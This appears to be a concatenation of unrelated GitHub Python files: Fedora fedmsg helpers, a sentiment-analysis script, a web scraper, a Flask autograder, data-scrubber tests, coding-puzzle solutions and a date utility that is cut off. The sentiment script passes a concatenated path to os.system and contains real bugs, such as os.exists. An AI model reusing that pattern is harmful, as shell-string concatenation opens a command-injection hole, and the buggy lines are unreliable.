ByCopr(AbstractCoprConglomerator):\n def matches(self, a, b, **config):\n a, b = a['msg'], b['msg']\n if a['copr'] != b['copr']:\n return False\n return True\n\n def get_secondary_icon(self, constituents, default):\n agents = set([m['msg']['user'] for m in constituents])\n if len(agents) == 1:\n user = constituents[0]['msg']['user']\n return avatar_url(user)\n else:\n return 'https://apps.fedoraproject.org/img/icons/copr.png'\n\n def get_link(self, constituents):\n owner = constituents[0]['msg']['owner']\n copr = constituents[0]['msg']['copr']\n return 'https://copr.fedoraproject.org/coprs/%s/%s/' % (owner, copr)\n\n\nclass ByUser(AbstractCoprConglomerator):\n def matches(self, a, b, **config):\n a, b = a['msg'], b['msg']\n if a['user'] != b['user']:\n return False\n return True\n\n def get_secondary_icon(self, constituents, default):\n user = constituents[0]['msg']['user']\n return avatar_url(user)\n\n def get_link(self, constituents):\n user = constituents[0]['msg']['user']\n return 'https://copr.fedoraproject.org/coprs/' + user\n","repo_name":"fedora-infra/fedmsg_meta_fedora_infrastructure","sub_path":"fedmsg_meta_fedora_infrastructure/conglomerators/copr/copr.py","file_name":"copr.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"79"} +{"seq_id":"30008391219","text":"from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nimport csv\nimport re\nimport os\n\n\"\"\"\nThis function will calculate the sentiment values for each comment in the\ntraining and testing files using vader and store the results into \nfiles referenced later\n\"\"\"\ndef run(testCsvFile,trainCsvFile,testSentimentFile,trainSentimentFile,\\\n singQuote, workDir): \n words = {}\n\n lineCount = 0;\n \n analyzer = SentimentIntensityAnalyzer()\n \n allOutput = \"\";\n with open(testCsvFile, mode='r') as csv_file:\n \tcsv_reader = csv.DictReader(csv_file)\n \tfor row in csv_reader:\n \t\tif lineCount == 0:\n \t\t\tlineCount += 1\n \t\tlineCount += 1\n \t\tvs = analyzer.polarity_scores(row[\"comment_text\"])\n \t\tallOutput += str(row[\"id\"])+','+str(vs[\"neg\"])+','+\\\n 
str(vs[\"neu\"])+','+str(vs[\"pos\"])+','+str(vs[\"compound\"])+\"\\n\"\n \n with open(testSentimentFile,\"w\") as output:\n \toutput.write(allOutput)\n \n allOutput = \"\";\n with open(trainCsvFile, mode='r') as csv_file:\n \tcsv_reader = csv.DictReader(csv_file)\n \tfor row in csv_reader:\n \t\tif lineCount == 0:\n \t\t\tlineCount += 1\n \t\tlineCount += 1\n \t\tvs = analyzer.polarity_scores(row[\"comment_text\"])\n \t\tallOutput += str(row[\"id\"])+','+str(vs[\"neg\"])+','\\\n +str(vs[\"neu\"])+','+str(vs[\"pos\"])+','+str(vs[\"compound\"])+\"\\n\"\n \t\tif singQuote:\n \t\t\trow[\"comment_text\"] = re.sub('[^a-zA-Z0-9\\']+',' ', \\\n row[\"comment_text\"])\n \t\telse:\n \t\t\trow[\"comment_text\"] = re.sub('[^a-zA-Z0-9]+',' ', \\\n row[\"comment_text\"])\n \t\trow[\"comment_text\"] = re.sub('\\s+',' ',row[\"comment_text\"])\n \t\trow[\"comment_text\"] = re.sub('^\\s+','',row[\"comment_text\"])\n \t\trow[\"comment_text\"] = re.sub('\\s+$','',row[\"comment_text\"]).lower()\n \t\tarr = row[\"comment_text\"].split(' ')\n \t\tfor j in range(0,len(arr)):\n \t\t\tif not re.search(\"^\\w+'\\w+$\",arr[j]):\n \t\t\t\tcontinue\n \t\t\tif re.search(\"^\\w+'\\w+$\",arr[j]) and arr[j] not in words:\n \t\t\t\tprint(arr[j])\n \t\t\tif arr[j] not in words:\n \t\t\t\twords[arr[j]] = \"\"\n \t\t\twords[arr[j]] += str(row[\"id\"])+','+str(row[\"target\"])+','\\\n +str(vs[\"neg\"])+','\\\n +str(vs[\"neu\"])+','+str(vs[\"pos\"])+','\\\n +str(vs[\"compound\"])+\"\\n\"\n \n \n with open(trainSentimentFile,\"w\") as output:\n \toutput.write(allOutput)\n\n if not os.exists(workDir+\"/words\"):\n os.system(\"mkdir \" + workDir+\"/words\")\n with open(workDir+\"/wordsList.txt\",mode=\"w\") as wordListFile:\n for word in words:\n wordListFile.write(word+\"\\n\")\n with open(workDir+\"/words/\"+word+\".csv\") as output:\n output.write(words[word])\n","repo_name":"abfarahani/Toxicity-Classification","sub_path":"src/calcWordSentiment.py","file_name":"calcWordSentiment.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"18517537140","text":"n=int(input(\"min:\"))\nm=int(input(\"max:\"))\na=[]\nwhile n<=m:\n s=[]\n while n!=1:\n if n%2==0:\n n=int(n//2)\n s.append(n)\n elif n%2==1:\n n=int(3*n+1)\n s.append(n)\n a.append(len(s))\n print(len(s))\n n=n+1\nprint(a)\n","repo_name":"eisbetterthanpi/python","sub_path":"c c c.py","file_name":"c c c.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30225528021","text":"import subprocess\nimport os\nimport torch\nimport shutil\n\nprint(\"检测是否有可用的CUDA设备中……\")\n# 检查是否有可用的CUDA设备\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\n print(\"加速成功!使用的设备:CUDA\")\nelse:\n device = torch.device(\"cpu\")\n print(\"加速失败!使用的设备:CPU\")\n\nprint(\"\\n请选择蒙版生成算法\")\nprint(\"1. 快速,速度快但质量稍差\")\nprint(\"2. 
标准,质量更好\")\n\n# 定义需要处理的视频文件路径\nfolder_path = os.path.dirname(os.getcwd())\n\n# 定义输出图片和蒙版的目录\nframe_out_dir = os.path.join(folder_path, \"video_frame\")\nmask_out_dir = os.path.join(folder_path, \"video_mask\")\n\n# 蒙版目录存在就删除\nif os.path.exists(mask_out_dir):\n shutil.rmtree(mask_out_dir)\n# 创建蒙版输出目录\nos.makedirs(mask_out_dir)\n\n# 设置Torch不使用图形界面显示\nos.environ[\"PYTORCH_JIT\"] = \"1\"\n\n# 使用CUDA进行加速\ntorch.set_grad_enabled(False)\n\n# 选择蒙版生成模式\nchoice2 = input(\"请输入蒙版算法的编号:\")\nif choice2 == '1':\n print(\"你选择了快速模式\")\n print(\"开始生成蒙版,请注意查看进度。根据图片数量,时间可能很长。\\n你可以随时按Ctrl+C停止生成。\")\n subprocess.run(\n ['transparent-background', '--source', frame_out_dir, '--dest', mask_out_dir, '--type', 'map', '--fast'])\nelse:\n print(\"你选择了标准模式\")\n print(\"开始生成蒙版,请注意查看进度。根据图片数量,时间可能很长。\\n你可以随时按Ctrl+C停止生成。\")\n subprocess.run(['transparent-background', '--source', frame_out_dir, '--dest', mask_out_dir, '--type', 'map'])\n\n# 开始修正蒙版名称\nfiles = sorted(os.listdir(mask_out_dir))\n\n# 遍历文件列表\nfor filename in files:\n if filename.lower().endswith('.png'):\n file_name, n1 = map(str, filename.split('_'))\n new_file = f'{file_name}.png'\n\n # 构建文件完整路径\n file_path = os.path.join(mask_out_dir, filename)\n new_file_path = os.path.join(mask_out_dir, new_file)\n\n # 重命名文件\n os.rename(file_path, new_file_path)\n\nprint(\"蒙版文件生成完成!\")\n\n# 是否进行下一步\nchoice = input(\"\\n是否直接开始下一步,把视频帧和蒙版进行裁切?\\n1. 是\\n2. 否\\n请输入你的选择:\")\nif choice == \"1\":\n subprocess.run(['python', '03_CropImage.py'])\nelse:\n quit()\n","repo_name":"ainanoha/AetherConverTools","sub_path":"bin/02_MaskCreation.py","file_name":"02_MaskCreation.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"31620438444","text":"import sys\n#sys.stdin.read 이렇게 사용하면 ctrl+D, 즉 EOF가 입력될때까지 입력을 받음\ninput = sys.stdin.read\n#파이썬에서 *을 사용하면 입력값이 정해지지 않았을 때를 의미(가변인자)\nn, *arr = input().split()\nfor i in range(len(arr)):\n #파이썬에서 리스트를 뒤집는 방법으로, [::-1]은 슬라이싱 기법\n #요소를 처음부터 끝까지 역순으로 뒤집는 것을 의미\n arr[i] = arr[i][::-1]\narr = list(map(int, arr))\narr = sorted(arr)\nfor i in range(len(arr)):\n print(arr[i])","repo_name":"seyeon22222/Self_study","sub_path":"Sort2/Reverse_sort(5648).py","file_name":"Reverse_sort(5648).py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"530109774","text":"import pytest\n\nfrom apigateway.biz.access_log.data_scrubber import DataScrubber\nfrom apigateway.biz.access_log.exceptions import NotScrubbedException\n\n\nclass TestDataScrubber:\n @pytest.mark.parametrize(\n \"content, expected\",\n [\n (\"\", False),\n ('{\"app_code\": \"test\"}', False),\n ('{\"app_secret\": \"xxx\"}', True),\n ('{\"bk_ticket\": \"xxx\"}', True),\n ],\n )\n def test_contains_sensitive_data(self, content, expected):\n data_scrubber = DataScrubber()\n result = data_scrubber._contains_sensitive_data(content)\n assert result is expected\n\n @pytest.mark.parametrize(\n \"content, expected\",\n [\n # ok, json data, matched sensitive key\n (\n '{\"app_code\": \"test\", \"app_secret\": \"xxx\"}',\n '{\"app_code\": \"test\", \"app_secret\": \"***\"}',\n ),\n # ok, urlencoded data, matched sensitive key\n (\n \"app_code=test&app_secret=test\",\n \"app_code=test&app_secret=%2A%2A%2A\",\n ),\n # ok, json data, part matched sensitive key\n (\n '{\"app_code\": \"test\", \"my_password\": \"xxx\"}',\n '{\"app_code\": \"test\", \"my_password\": \"***\"}',\n ),\n ],\n )\n def test_scrub_body(self, content, 
expected):\n data_scrubber = DataScrubber()\n result = data_scrubber._scrub_body(content)\n assert result == expected\n\n @pytest.mark.parametrize(\n \"content\",\n [\n # error, invalid json data\n '{\"app_code\": \"test\", \"app_secr',\n # error, invalid urlencoded data\n \"a=b&cd\",\n ],\n )\n def test_scrub_body__error(self, content):\n data_scrubber = DataScrubber()\n with pytest.raises(NotScrubbedException):\n data_scrubber._scrub_body(content)\n\n @pytest.mark.parametrize(\n \"data, expected\",\n [\n (\n # ok, matched\n {\n \"app_code\": \"test\",\n \"app_secret\": \"test\",\n },\n {\n \"app_code\": \"test\",\n \"app_secret\": \"***\",\n },\n ),\n # ok, part matched\n (\n {\n \"app_code\": \"test\",\n \"my_password\": \"test\",\n },\n {\n \"app_code\": \"test\",\n \"my_password\": \"***\",\n },\n ),\n # ok, no sensitive data\n (\n {\n \"app_code\": \"test\",\n \"at\": \"test\",\n },\n {\n \"app_code\": \"test\",\n \"at\": \"test\",\n },\n ),\n # ok, some value is empty\n (\n {\n \"app_code\": \"test\",\n \"at\": \"\",\n },\n {\n \"app_code\": \"test\",\n \"at\": \"\",\n },\n ),\n ],\n )\n def test_scrub_by_keys(self, data, expected):\n data_scrubber = DataScrubber()\n result = data_scrubber._scrub_by_keys(data)\n assert result == expected\n","repo_name":"TencentBlueKing/blueking-apigateway","sub_path":"src/dashboard/apigateway/apigateway/tests/biz/access_log/test_data_scrubber.py","file_name":"test_data_scrubber.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"79"} +{"seq_id":"41104401972","text":"import scrapy\nimport re\n\nclass PriceSpider(scrapy.Spider):\n # name of the spider, used when invoking the spider through command line\n name = \"price\"\n\n # starting point of the spider, use self.parse as callback by default\n start_urls=['https://www.bicyclebluebook.com/SearchBikes.aspx']\n\n # extract links of all makes\n def parse(self, response):\n rawMakeLinks = response.css(\"a::attr(href)\").getall()\n cleanMakeLinks = filter(lambda x: \"BicycleDatabase.aspx\" in x, rawMakeLinks)\n cleanMakeLinks = map(lambda x: 'https://www.bicyclebluebook.com' + x, cleanMakeLinks)\n for makeLink in cleanMakeLinks:\n yield scrapy.Request(url=makeLink, callback=self.parse_models)\n\n # extract links of all models\n def parse_models(self, response):\n rawModelLinks = response.css(\"a::attr(href)\").getall()\n cleanModelLinks = filter(lambda x: \"SearchListing.aspx\" in x, rawModelLinks)\n cleanModelLinks = map(lambda x: 'https://www.bicyclebluebook.com' + x, cleanModelLinks)\n for modelLink in cleanModelLinks:\n yield scrapy.Request(url=modelLink, callback=self.parse_years)\n \n # extract year, make, model, category, and link of all years\n def parse_years(self, response):\n rawContent = response.css(\".values-line\").getall()\n for content in rawContent:\n #make = content.css(\".col-sm-2\").get()\n year = re.search(r'
<span class=\"year\">(.*?)</span>', content).group(1)\n            # NOTE: the markup in these four patterns was stripped during extraction; the tag and class names are reconstructed placeholders\n            make = re.search(r'<span class=\"make\">(.*?)</span>', content).group(1)\n            model = re.search(r'<span class=\"model\">(.*?)</span>', content).group(1)\n            category = re.search(r'<span class=\"category\">(.*?)</span>', content).group(1)\n            link = 'https://www.bicyclebluebook.com' + re.search(r'onclick=\"location.href=\\'(.*?)\">', content).group(1)\n            yield scrapy.Request(url=link, callback=self.parse_bike, cb_kwargs={'year':year, 'make':make, 'model':model, 'category':category})\n\n    # extract bike price evaluation and description\n    def parse_bike(self, response, year, make, model, category):\n        prices=[]\n        for price in response.css(\".col-xs-6::text\").getall():\n            if '$' in price:\n                clean = price.strip().replace('\\r\\n', '').replace(' ', '').replace('\\'', '')\n                prices.append(clean)\n        res = {'year':year, 'make':make, 'model':model, 'category':category}\n        for i in range(len(prices)):\n            if i < len(prices)-1:\n                minPrice = prices[i].split('-')[0].replace('$', '')\n                maxPrice = prices[i].split('-')[1].replace('$', '')\n                if i == 0:\n                    res[\"excellent\"] = (minPrice, maxPrice)\n                elif i == 1:\n                    res[\"very-good\"] = (minPrice,maxPrice)\n                elif i == 2:\n                    res['good'] = (minPrice, maxPrice)\n                elif i == 3:\n                    res['fair'] = (minPrice, maxPrice)\n            else:\n                price = prices[i].replace(',', '').replace('$', '')\n                res['msrp'] = (price)\n        res['img'] = response.css('.col-sm-12 img::attr(src)').get()\n        res['raw-description'] = response.css(\".bvg-product-details\").get()\n        yield res\n","repo_name":"EthanInSeattle/bikevaluebook","sub_path":"crawler/bike_value_book/bike_value_book/spiders/price_spider.py","file_name":"price_spider.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"11997178886","text":"import pickle\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report\n\n# load the data\ndf = pd.read_csv(\"data/data.csv\")\nX = df['doc']\ny = df['class']\n\n# split data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state=21)\n\n# model pipeline\npipe_knn = Pipeline([['tfidf', TfidfVectorizer()], ['knn', KNeighborsClassifier()]])\n\n# use grid search to find the optimal number of neighbours\nparam_range = [2,3,4,5,6,7]\nparams = {'knn__n_neighbors': param_range}\ngrid_knn = GridSearchCV(estimator = pipe_knn, \n                        param_grid = params,\n                        cv=10,\n                        scoring='f1')\ngrid_knn.fit(X_train, y_train)\n\n# model with optimal parameters\nmodel = grid_knn.best_estimator_\n\n# check model's performance on the test set\ny_pred = model.predict(X_test)\nclf_report = classification_report(y_test, y_pred)\nprint(clf_report)\nwith open(\"model_performance_report.txt\", \"w\") as text_file:\n    text_file.write(clf_report)\n\n# save the model for later use\nwith open('knn_model.pkl', 'wb') as file:\n    pickle.dump(model, file)\n\n","repo_name":"piyushrj/joke-vs-insult","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"74411703296","text":"import collections\nimport re\nfrom typing import Deque\n\n\nclass Solution3:\n    def isPalindrome(self, s: str) -> bool:\n        s = s.lower()\n        s = re.sub('[^a-z0-9]', '', s)\n        \n        return s == s[::-1]\n    \n    \n    \n\nclass Solution1:\n    def isPalindrome(self, s: str) -> bool:\n        \n        #1. data preprocessing -> ['a','m', .. '[a]']\n        strs = []\n        for char in s:\n            if char.isalnum():\n                strs.append(char.lower())\n        \n        #2. check whether it is a palindrome\n        while len(strs) > 1: # handles the edge cases\n            if strs.pop(0) != strs.pop():\n                return False\n        # if every comparison passed, return True\n        return True\n        \n        \n\n    \nclass Solution:\n    def isPalindrome(self, s: str) -> bool:\n        \n        # declare the container as a deque\n        strs: Deque = collections.deque()\n        \n        for char in s: \n            if char.isalnum():\n                strs.append(char.lower())\n        \n        while len(strs) > 1: \n            if strs.popleft() != strs.pop():\n                return False\n        \n        return True\n        \n    \n","repo_name":"juyeong-repo/Algorithm","sub_path":"0125-valid-palindrome/0125-valid-palindrome.py","file_name":"0125-valid-palindrome.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"74082524094","text":"import json\n\ndef main():\n    print(\"Crawling through project configs\")\n    with open(\"GNS3/project.gns3\", \"r\") as file:\n        project = json.loads(file.read())\n    name = project[\"name\"]\n    print(f\"Project: {name}\")\n    nodes = {}\n    for node in project[\"topology\"][\"nodes\"]:\n        name = node[\"name\"]\n        id = node[\"node_id\"]\n        print(f\"{name}: {id}\")\n        nodes[id] = name\n    for link in project[\"topology\"][\"links\"]:\n        node0 = link[\"nodes\"][0][\"node_id\"]\n        node1 = link[\"nodes\"][1][\"node_id\"]\n        print(f\"{nodes[node0]} -- {nodes[node1]}\")\n    mappings = {}\n    for (k, v) in nodes.items():\n        pass\n\n\n    with open(\"mappings.json\", \"w\") as file:\n        json.dump({}, file)\n    \n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"Gui-Yom/nas","sub_path":"crawlproject.py","file_name":"crawlproject.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"1368270657","text":"from flask import Flask, request\n\nfrom src.exceptions import Container\nfrom src.homeworks.homework1 import homework1\nfrom src.homeworks.homework2 import homework2\nfrom src.homeworks.homework3 import homework3\nfrom src.homeworks.homework4 import homework4\nfrom src.messages import error\n\navailable_homeworks = {\n    '1': homework1,\n    '2': homework2,\n    '3': homework3,\n    '4': homework4\n}\n\n\napp = Flask(__name__, instance_relative_config=True)\napp.config.from_pyfile('configs.cfg')\n\n\ndef request_checking(request, token_level, homework_number):\n    if not request.is_json:\n        raise Container(error('Sent format is not a json', 'json'))\n    data = request.get_json()\n    if 'token' not in data:\n        raise Container(error('The token is not included', 'token_missing'))\n    if data['token'] != app.config[token_level]:\n        raise Container(\n            error(\n                'The token is not correct/is invalid',\n                'token_wrong'))\n    if homework_number not in available_homeworks:\n        raise Container(\n            error(\n                f'There is no homework {homework_number}',\n                'no_homework'))\n\n    return data\n\n\n@app.route('/ping')\ndef ping():\n    # return {'message': 'Not yet ready.'}\n    return {'status': 'OK'}\n\n\n@app.route('/force_reload/<homework_number>', methods=['POST'])\ndef reload_tests(homework_number):\n    try:\n        request_checking(\n            request,\n            token_level='ADMIN_TOKEN',\n            homework_number=homework_number)\n    except Container as e:\n        return e.data\n\n    available_homeworks[homework_number].reload_tests()\n\n    return {'status': 'OK'}\n\n\n@app.route('/api/autocheck/<homework_number>/<question_number>',\n           methods=['POST'])\ndef autocheck(homework_number, question_number):\n    try:\n        data = request_checking(\n            request,\n            token_level='TOKEN',\n            homework_number=homework_number)\n    except Container as e:\n        return e.data\n\n    return available_homeworks[homework_number].check(\n        question_number=question_number,\n        
data=data)\n\n\n@app.route('/api/tests/<homework_number>/<question_number>',\n           methods=['POST'])\ndef process(homework_number, question_number):\n    try:\n        data = request_checking(\n            request,\n            token_level='TOKEN',\n            homework_number=homework_number)\n    except Container as e:\n        return e.data\n\n    return available_homeworks[homework_number].get_test(\n        question_number=question_number,\n        data=data)\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0')\n","repo_name":"dccuchile/CC6204","sub_path":"autocorrect-server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"79"}
+{"seq_id":"7012229604","text":"from PyQt5 import QtGui, QtCore, QtWidgets\n\n\n# Add new item to QTree from list of strings\ndef qtreeAddItem(self, qtree, vallist):\n    item = QtWidgets.QTreeWidgetItem(qtree)\n    qtree.addTopLevelItem(item)\n\n    for idx, val in enumerate(vallist):\n        item.setText(idx, val)","repo_name":"HelmchenLabSoftware/HHNE","sub_path":"src/qtree_helper.py","file_name":"qtree_helper.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"24420099227","text":"def compareTriplets(a, b):\n    a_points = 0\n    b_points = 0\n\n    for (a_s, b_s) in zip(a, b):\n        if a_s > b_s:\n            a_points += 1\n        elif b_s > a_s:\n            b_points += 1\n    \n    return [a_points, b_points]\n\n\nif __name__ == '__main__':\n    a = [17, 28, 30]\n    b = [99, 16, 8]\n\n    print(compareTriplets(a, b))","repo_name":"xiayongk/HackerRank","sub_path":"Algorithms/Warmup/compare_the_triplets.py","file_name":"compare_the_triplets.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"36519980064","text":"from __future__ import annotations\n\nimport re\nimport datetime\nfrom itertools import permutations\n\n\nclass CustomDateTime:\n    SUPPORTED_FORMAT = {\n\n    }\n    SUPPORTED_LANG = (\"fr\", \"en\")\n    MONTH = {\n        1: {\"value\": [\"janvier\", \"january\", \"janv\", \"jan\", \"ja\"], \"abr\": (\"janv\", \"jan\")},\n        2: {\"value\": [\"février\", \"february\", \"févr\", \"fevr\", \"fév\", \"feb\", \"fevrier\", \"fev\", \"fe\"],\n            \"abr\": (\"févr\", \"feb\")},\n        3: {\"value\": [\"mars\", \"march\", \"mar\"], \"abr\": (\"mars\", \"march\")},\n        4: {\"value\": [\"avril\", \"april\", \"avr\", \"apr\", \"ap\", \"av\"], \"abr\": (\"avr\", \"apr\")},\n        5: {\"value\": [\"mai\", \"may\"], \"abr\": (\"mai\", \"may\")},\n        6: {\"value\": [\"juin\", \"june\", \"jun\"], \"abr\": (\"juin\", \"june\")},\n        7: {\"value\": [\"juillet\", \"july\", \"juil\", \"jul\"], \"abr\": (\"juil\", \"july\")},\n        8: {\"value\": [\"août\", \"august\", \"aout\", \"aug\", \"ao\"], \"abr\": (\"août\", \"aug\")},\n        9: {\"value\": [\"septembre\", \"september\", \"sept\", \"sep\"], \"abr\": (\"sept\", \"sept\")},\n        10: {\"value\": [\"octobre\", \"october\", \"oct\"], \"abr\": (\"oct\", \"oct\")},\n        11: {\"value\": [\"novembre\", \"november\", \"nov\", \"no\"], \"abr\": (\"nov\", \"nov\")},\n        12: {\"value\": [\"décembre\", \"december\", \"decembre\", \"dec\", \"déc\", \"de\"], \"abr\": (\"déc\", \"dec\")}\n    }\n    WEEKDAYS = [\"Lundi\", \"Mardi\", \"Mercredi\", \"Jeudi\", \"Vendredi\", \"Samedi\", \"Dimanche\"]\n    WEEKDAYS_ABR = [\"Lun\", \"Mar\", \"Mer\", \"Jeu\", \"Ven\", \"Sam\", \"Dim\"]\n    WEEKDAYS_EN = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n    WEEKDAYS_EN_ABR = [\"Mon\", \"Tues\", \"Wed\", 
\"Thur\", \"Fri\", \"Sat\", \"Sun\"]\n\n DEFAULT_LANG = \"fr\"\n\n def __init__(self, date_value: str | datetime.datetime | datetime.date = \"now\",\n format_=None, **kwargs):\n self._source = self._parse(date_value, format_=format_, **kwargs)\n\n def __sub__(self, other):\n if isinstance(other, int):\n return CustomDateTime.from_calculation(self._source, minus_or_add=\"-\" + str(other) + \"day\")\n return (self.date - CustomDateTime(other).date).days\n\n def __add__(self, other):\n if isinstance(other, int):\n return CustomDateTime.from_calculation(self._source, minus_or_add=str(other) + \"day\")\n elif isinstance(other, str):\n return CustomDateTime.from_calculation(self._source, minus_or_add=other)\n return self.date + other\n\n __radd__ = __add__\n\n def __call__(self, *args, **kwargs):\n return self._source\n\n def __getattr__(self, item):\n return getattr(self._source, item)\n\n def __str__(self):\n return str(self._source)\n\n def __repr__(self):\n return repr(self._source)\n\n # OK\n def time_is(self, value) -> bool:\n try:\n res = re.search(r'(\\d{1,2})(?:\\s*h?\\s*)?(?::\\s*(\\d{1,2})'\n r'(?:\\s*m?\\s*)?)?(?::\\s*(\\d{1,2})(?:\\s*s?\\s*)?(?:\\.(\\d+))?)?',\n value,\n flags=re.I | re.S).groups()\n is_equal = False\n this = self._source.time()\n for i, t in enumerate(\"hour,minutes,second,microsecond\".split(\",\")):\n if res[i] is None:\n return is_equal\n assert getattr(this, t) == int(res[i])\n is_equal = True\n\n except (AttributeError, AssertionError):\n return False\n\n @property\n def date(self):\n return self._source.date()\n\n @property\n def is_datetime(self):\n return (self._source.minute > 0 or self._source.second > 0 or\n self._source.hour > 0 or self._source.microsecond > 0)\n\n @staticmethod\n def _get_weekday(date_value: datetime.date | datetime.date, abr=False):\n return (getattr(CustomDateTime, \"WEEKDAYS\" + (\n \"_EN\" if CustomDateTime.DEFAULT_LANG.lower() == \"en\" else \"\"\n ) + (\"_ABR\" if abr else \"\"))[date_value.weekday()])\n\n @staticmethod\n def _get_month(date_value: datetime.date | datetime.date, abr=False):\n return CustomDateTime.MONTH[date_value.month][\"abr\" if abr else \"value\"][\n (1 if CustomDateTime.DEFAULT_LANG.lower() == \"en\" else 0)]\n\n @property\n def get_french_weekday(self):\n return self.WEEKDAYS[self._source.weekday()]\n\n # Ok\n @staticmethod\n def range_date(inf: datetime.date | CustomDateTime | str, sup: datetime.date | CustomDateTime | str | int = None,\n step=1,\n freq=\"day\"):\n assert isinstance(step, int) and step != 0, \"Bad value of step param. 
%s given\" % (step,)\n freq = freq.lower().strip()\n freq = freq[:-1] if len(freq) > 1 and freq[-1] == \"s\" else freq\n freq = (\n {\n \"d\": \"day\", \"j\": \"day\", \"day\": \"day\", \"jour\": \"day\",\n \"minute\": \"minute\", \"min\": \"minute\",\n \"sec\": \"second\", \"s\": \"second\", \"second\": \"second\",\n \"seconde\": \"second\",\n \"week\": \"week\", \"semaine\": \"week\", \"sem\": \"week\",\n \"w\": \"week\",\n \"h\": \"hour\", \"hour\": \"hour\", \"heure\": \"hour\",\n \"millisecond\": \"millisecond\", \"mil\": \"millisecond\",\n \"milliseconde\": \"millisecond\",\n \"month\": \"month\", \"moi\": \"month\", \"m\": \"month\",\n \"y\": \"year\", \"annee\": \"year\", \"année\": \"year\", \"an\": \"year\",\n \"year\": \"year\", \"a\": \"year\"\n }.get(freq, \"day\") + \"s\")\n\n if sup is None:\n now = (datetime.datetime.now() if\n freq in [\"hours\", \"minutes\", \"seconds\", \"milliseconds\"]\n else datetime.date.today())\n inf = CustomDateTime(inf)\n inf = (inf() if\n freq in [\"hours\", \"minutes\", \"seconds\", \"milliseconds\"]\n else inf.date)\n if inf < now:\n sup = \"now\"\n else:\n sup = inf\n inf = \"now\"\n\n inf = CustomDateTime(inf)()\n if isinstance(sup, int):\n sup = inf + datetime.timedelta(days=sup)\n if sup < inf:\n step = -1 if not step else -step\n else:\n sup = CustomDateTime(sup)()\n\n if freq in [\"months\", \"years\"]:\n sup = sup.date()\n inf = inf.date()\n temp = inf\n sign = 1 if sup > inf and step > 0 else -1\n while True:\n if sign == 1 and temp > sup:\n return\n elif sign == -1 and temp < sup:\n return\n yield temp\n temp = CustomDateTime.from_calculation(temp, minus_or_add=str(sign * abs(step)) + freq).date\n else:\n if freq == \"minutes\":\n d = int((sup - inf).total_seconds() / 60)\n elif freq == \"hours\":\n d = int((sup - inf).total_seconds() / (60 * 60))\n elif freq == \"weeks\":\n d = int((sup - inf).days / 7)\n else:\n if freq in [\"hours\", \"minutes\", \"seconds\", \"milliseconds\"]:\n pass\n else:\n # day\n sup = sup.date()\n inf = inf.date()\n d = getattr(sup - inf, freq)\n sign = 1 if d > 0 and step > 0 else -1\n\n d = int(abs(d) + 1)\n for i in range(0, d, abs(step) or 1):\n yield inf + datetime.timedelta(**{freq: i * sign})\n\n @staticmethod\n def _parse_format(d_format, current_time=None):\n time_ = False\n d_format = d_format.replace(\"%\", \"\")\n d_format = re.sub(\"yyyy\", \"%Y\", d_format, flags=re.I)\n d_format = re.sub(\"yy\", \"%y\", d_format, flags=re.I)\n d_format = re.sub(\"aaaa\", \"%Y\", d_format, flags=re.I)\n d_format = re.sub(\"aa\", \"%y\", d_format, flags=re.I)\n\n d_format = re.sub(\"mm\", \"%m\", d_format, flags=re.I)\n d_format = re.sub(\"dd\", \"%d\", d_format, flags=re.I)\n d_format = re.sub(\"jj\", \"%d\", d_format, flags=re.I)\n d_format = re.sub(\"yyyy\", \"%Y\", d_format, flags=re.I)\n\n # hour\n d_format = re.sub(\"hh\", \"%H\", d_format, flags=re.I)\n d_format = re.sub(\"ss\", \"%S\", d_format, flags=re.I)\n if current_time is not None:\n d_format = re.sub(\"day\", CustomDateTime._get_weekday(current_time), d_format, flags=re.I)\n d_format = re.sub(r\"d\\.\", CustomDateTime._get_weekday(current_time, abr=True), d_format, flags=re.I)\n d_format = re.sub(\"jour\", CustomDateTime._get_weekday(current_time), d_format, flags=re.I)\n d_format = re.sub(r\"j\\.\", CustomDateTime._get_weekday(current_time, abr=True), d_format, flags=re.I)\n d_format = re.sub(\"month\", CustomDateTime._get_month(current_time), d_format, flags=re.I)\n d_format = 